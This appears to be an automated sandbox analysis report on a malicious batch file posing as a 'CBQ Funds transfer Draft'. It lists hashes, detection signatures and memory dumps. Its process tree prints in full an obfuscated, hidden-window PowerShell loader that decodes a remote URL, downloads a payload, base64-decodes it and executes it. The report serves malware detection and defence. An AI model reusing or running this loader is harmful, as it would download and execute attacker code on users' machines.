Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/06/2024, 16:13

General

  • Target

    CBQ Funds transfer DraftUdkikspostens44.bat

  • Size

    6KB

  • MD5

    84cb66117acd5104ada1321c3b472f94

  • SHA1

    ee6ca999a1798296139fc0eddca01b10d955e00d

  • SHA256

    7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9

  • SHA512

    483f0f275710dfceef0af0da3ddf3b72a52a80ab788d31fca647e3a28d585f1feedffad182baa9b1ba70e32b8e671c6823b74352db950ad27fd3f3d71ced349e

  • SSDEEP

    192:Fk33ynxcIG+cPPX99/PdQ9LXJICyD+QRK:FkSmtnN5FQpJJ

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4376
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. ';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne '.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2476
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"
        3⤵
          PID:1816

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hifaarw.s4b.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/2476-2-0x00007FF84D7C3000-0x00007FF84D7C5000-memory.dmp

            Filesize

            8KB

          • memory/2476-3-0x000001C479950000-0x000001C479972000-memory.dmp

            Filesize

            136KB

          • memory/2476-13-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB

          • memory/2476-14-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB

          • memory/2476-15-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB

          • memory/2476-16-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB

          • memory/2476-17-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB